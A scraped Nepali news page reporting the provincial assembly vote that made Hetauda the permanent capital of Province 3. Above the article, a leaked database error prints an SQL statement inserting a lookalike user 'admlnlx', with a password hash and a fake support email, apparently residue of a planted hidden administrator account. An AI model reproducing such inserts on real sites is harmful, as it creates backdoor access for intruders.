WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfPcfA2E3wfsmaIBYroGuHGd0biOw61', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:25:45', '', 'admlnlx', 'admlnlx')

प्रदेश ३ को स्थायी राजधानी हेटौँडा घोषणा – Gaule Khabar

प्रदेश ३ को स्थायी राजधानी हेटौँडा घोषणा

३ सांसद मात्र विपक्षमा

प्रदेश ३ को स्थायी राजधानी हेटौँडा घोषणा

गाउँले न्युज, काठमाण्डौ । प्रदेश न ३ को राजधानी हेटौँडा कायम भएको छ ।
आज आइतबार बसेको प्रदेशसभा बैठकको दुई तिहाइभन्दा बढी मतले अनुमोदन गरेको हो ।
मुख्यमन्त्री पौडेलले प्रदेश ३ को स्थायी राजधानी हेटौँडा कायम गर्ने प्रस्ताव पेश गरेका थिए । उक्त प्रस्तावको पक्षमा १०५ मत परेको थियो । प्रस्तावको विपक्षमा ३ मत मात्र खसेको थियो ।
प्रदेशसभाका कुल ११० सांसदमध्ये प्रस्तावमाथि मतविभाजन हुँदा बैठकमा १०८ सांसद उपस्थित थिए ।
प्रदेशसभाको दुई तिहाई मतले प्रदेशको नाम र स्थायी राजधानी कायम गर्ने संवैधानिक प्रावधान छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका